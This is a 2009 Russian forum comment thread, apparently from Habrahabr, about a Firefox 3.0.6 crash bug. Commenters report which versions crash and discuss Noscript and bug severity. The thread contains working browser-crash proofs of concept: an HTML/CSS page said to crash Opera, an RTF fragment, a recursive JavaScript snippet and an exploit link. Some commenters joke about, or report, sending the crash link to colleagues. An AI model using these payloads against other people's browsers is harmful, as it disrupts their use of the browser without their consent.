DoS атака Mozilla Firefox 3.0.6

[gta4kv]

>> P.S. если хабрасообщество решит, что код приводить всё же не стоило, я его уберу
еще как стоило. *потирает руки и злобно смеётся*

[jean]

ну так на себе без кода не проверишь!

[Morfi]

А где on-line пример? :)

[1024]

добавил в топик

[1024]

угу, noscript спасает в этом случае

[Vovanys]

под ubuntu c включенным noscript не падает, как только делаешь временно разрешить вылетает )

[romad]

а еще если браузер совсем не загружать, тоже не падает

[jeje]

Для поддержания полноты информации пояснили вы что делает конкретно код. Я вод третью строчку первый раз вижу в глаза.

[Castro]

Минутное гугление привело на www.milw0rm.com/, но всё равно не понял что означает параметр 'BackColor'

[jeje]

Ну тогда и новость можно не делать, если все нагуглить можно ;)

[Castro]

:) Похоже браузер должен упасть от определения фонового цвета таким образом. Интересно, у кого-то он реально свалился?

[jean]

например, у меня, 3.0.3

[jeje]

Ура я нашел быстрый способ закрывать свой ff, скорость — 3 секунды :)

[kreout]

У меня на правый верхний крестик быстрее почему то…

[jeje]

Происходит закрытие окна, процесс в это время все еще висит в памяти, и может висеть еще с минуту. А тут сразу процесс вылетает.

[kreout]

Это критично?

Можно и комп выключать из розетки, быстрее будет

[jeje]

Когда требуется перезапуск — неприятно. Да и мои ответ был шуткой.

[Kastrulya]

хех. воистину. 2-3 секунды уходит. делаем домен bezpalevaff.ru и там злобный код. идет начальство-открой страницу.=)

[koliasoft]

А если идет начальник, а вы нажали на крестик для закрытия окна — то начальник быстренько смотрит в процессы?

А вот для быстрого перезапуска — самое оно. Только, по-моему, во время перезапуска мозилла сохраняет настройки. А с этой багой — нет.

[Kastrulya]

ну при нажатии крестика не факт, что закроется сразу даже само окно. а вдруг немного подвиснет? всяко бывает. а тут прям надежно так.

[leonard]

У меня. Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6

[1024]

я этого, к сожалению, не знаю…

[jeje]

Думаю msdn немного поможет в прояснении msdn.microsoft.com/en-us/library/ms533049(VS.85).aspx

[Castro]

А новость откуда собственно?
Ясное дело, что хабрасообщество решит убрать этот код.
Во-первых, не стоит дразнить читателей журнала «Хакир», а во-вторых, какой вывод должно сделать хабрасообщество при просмотре этого кода?

[1024]

Я первый раз прочёл на www.securitylab.ru/poc/368700.php. А так много где заметки есть по этому поводу. На www.milw0rm.com/, например.

Если решит убрать, то конечно уберу, не вопрос.

Вывод? Что этот код может привести к падению браузера. Ну и что надо заботиться о своей безопасности

[dmiceman]

какой вывод должно сделать хабрасообщество при просмотре этого кода?

То что не надо дереференсить нулевой указатель?

[Nc_Soft]

Что-то не падает…

[1024]

странно. лично у меня рухнул. выше в комментариях тоже отписывались о положительном результате

[Nc_Soft]

Все нормально, успешно рухнул :)
Я его просто в непустую страницу всунул в body.

[easyman]

А какая версия FF/OS у Вас?
Есть ли аддоны типа Noscript?

[Morozhko]

А причём тут DoS атака?

[1024]

ну потому что firefox отказывается_обслуживать

[almaz]

для него это нормально ;)

[FilimoniC]

Denial of Service. Отказ в обслуживании.

[Morozhko]

а по мне так это крэш браузера. Браузер же не обслуживает удалённых клиентов.

[seneast]

> тест (аккуратно, браузер фф скорее всего упадёт)

упал(

[Kastrulya]

здесь ключевое слово СКОРЕЕ ВСЕГО, т.к. падает он оочень быстро.

[Reey]

3.1b2 тож падает =\

[TR4V15]

тоже решил проверить, думал относится только к 3.0.* оказалось что передалось по наследству.

[Devgru]

Упал. 3.0.6, Ubuntu.

[Optik]

Устоял.

Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009021207 GranParadiso/3.0.6

[Optik]

С отключенным noscript рухнул.

[EvRiaL]

3.2a1pre «Minefield» — не подвержен.

[Barttos]

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox 3.1 Упал.

[tumkir]

3.1b3pre (ночная от 18 февраля) упал. а вот с 3.2a1pre (ночная от 22 февраля) все в порядке

[Dimusik]

3.0.6 — WinXP — упал моментально :)

[shtirlic]

https://bugzilla.mozilla.org/show_bug.cgi?id=456727 в багзилле

[jean]

хочется отметить, что судя по багзилле уязвимости 5 месяцев!

[f33l]

мда…
начал понимать тех, кто ставит noscript, раньше считал это ппц дикостью

[joice]

Gentoo
www-client/mozilla-firefox (3.0.6@16.02.2009): Firefox Web Browser + Noscript
полет нормальный :D

[kottt]

Про код это Вы зря. Обычно, когда сообщают об уязвимости, просто говорят, что она есть.
Кстати, у мозиллы уже версия 3.0.7 в релиз-кандидатах с 20 февраля (http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/)

[lifestar]

Почти всегда приводят пример кода или готовый код эксплойта.
Какой смысл в информации о «просто уязвимости», когда нет возможности её «пощупать»?

[redisko]

упал. только ссылку можно убрать, там пустая страница. пришлось самому html клепать

[kabachok]

зе зарепортили баг разработчикам? ))

[jean]

см. выше habrahabr.ru/blogs/infosecurity/52653/#comment_1398191

[kabachok]

а чеж они не чешутся-то?

[slam007]

код работает — ФФ 3 упал

[alagar]

кто то может код пояснить?

[kns]

{\rtf\pict\&&} ФФокапец. Как ни странно, но многие из моих знакомых сидят не на фоксе. Мелочь, а приятно.

[denim]

Mozilla/5.0 (X11; U; Linux x86_64; be; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6
падает
ФФ последнее время начинает разочаровывать, стал тормозной и не поворотливый.

[Jenyay]

По-моему, как раз наоборот он постепенно становится все шустрее и меньше жрет памяти.

[asci]

имхо, очевидно, что с noscript или отключенным яваскриптом все будет работать))
кстати, а что этот код должен делать (кроме убийства фф)?

[crx]

Спасибо, прислал всем сотрудникам ссылку вида a
ФФ отвалился только у интернов.

[nikzh]

Спасибо, закончу сегодня свой ночной интернет-серфинг необычным способом, а то как раз спать пора :)

[homm]

А вот и для оперы пряники:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title>SuperSelect</title>
  <style type="text/css">
    optgroup { display: table-row }
    option { display: table-cell }
  </style>

</head>
<body>
  <form>
     <select>
       <optgroup>
         <option>1</option>
         <option>2</option>
       </optgroup>
       <optgroup>
         <option>32222</option>
         <option>4</option>
       </optgroup>
     </select>
   </form>
</body>
</html>

* This source code was highlighted with Source Code Highlighter.

[egorinsk]

Работает!!!

Но в то время как Опера тоже глючна, она быстрее, безопаснее и показывает меньше рекламы, и работает бытсрее фаерфокса!!(Версия 3 — вообще тормоз)

p.s. Будь проклят маркетинг и бизнес-планы, убивающие хороший код.

[homm]

Зачем же так остро реагировать? Опера живет и процветает, постоянно выходят новые версии с новыми задумками и реализованными идеями. Так что никто её не убивает. А этот баг я уже засубмитил, и думаю не я один.

[kns]

• Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
• Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0

Падают. Интересно. :)

[myiworm]

Ну вот вам на ff2. Не закрывают второй год.
myiworm.com/public/exploits/firefox2/firefox_2_0_0_9-denial_of_service_2.html

[myiworm]

bugzilla.mozilla.org/show_bug.cgi?id=403010

[myiworm]

данный эксплоит был актуален с FF 2.0.0.9 до 2.0.0.20, и так и не был закрыт в течении полутора лет. Вот такая оперативность.

[GodSon]

да падает…
причем под линухами процесс висит еще долго и kill убивать его не хочет…

[egorinsk]

В мое время у команды kill была опция -9, хотя грохать GUI-процессы из ком. строки — изврат.

[BisnoyZakat]

Работает конечно отлично, а какое может быть реально применение этой баги? Т.е как мне могут этим навредить кроме того, что у меня браузер закроется? Если я правильно понимаю именно по-этому в багзилле до сих пор статус стоит нормал…

[kreout]

На хабре этот код бы под кнопку написать. Как долго вы бы думали что это и почему так происходит?
Приминение может быть быть в сфере зления пользователя так сказать, это тоже не мало.

[BisnoyZakat]

Все это так называемый киддинг… реальной экономической выгоды… финансовая выгода, к примеру, заставляет людей писать трояны =) и по-этому баги которые влекут за собой распространения троянов обозначают как «важно», а эта бага пустышка… ну закрылся бразуер и что? не один адекватный хакер не будет вешать это на взломанный ресурс.

[kreout]

Трояны для экономической выгоды. А обычные вирусы для чего? Для того же и этот код.

[vpbar]

Ну упал и упал. У меня вон фокс падает при открытии pdf. Вот это проблемка. А тут я даже сначало и не понял почему не работает, а потом вспомнил про Noscript. :)
Скрипты эт такая штука, что отказ в обслуживании можно сделать сотнями (тысяч) способов. Вот например
<script language=«Javascript»>
function bu(){ alert('BU'); bu(); };
bu();
</script>
Или это тоже считается эксплойтом и эксплуатирует какую-то уязвимость.

[Cruach]

Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.6) Gecko/2009020709 Fedora/3.0.6-1.0.140asp Firefox/3.0.6 рухнул…
*ушел ставить Noscript

[golden13]

SeaMonkey 2.0b1pre — не падает :)
(Noscript не стоит)

[webster]

упал…

[mgyk]

Ну падает и падает, где собственно проблема? Данные пользователя можно прочитать — нет. Использовать уязвимость для построения ботнета — нет. Возможностей положить любой браузер корявым джаваскриптом куча. Чинить надо, как и много других багов, но приоритет явно на багах где есть проблемы с безопастностью.

[homm]

Firefox/13.3.7?

[LDEV]

Хаха, думал фейк или пофиксили уже — слетело всё :)))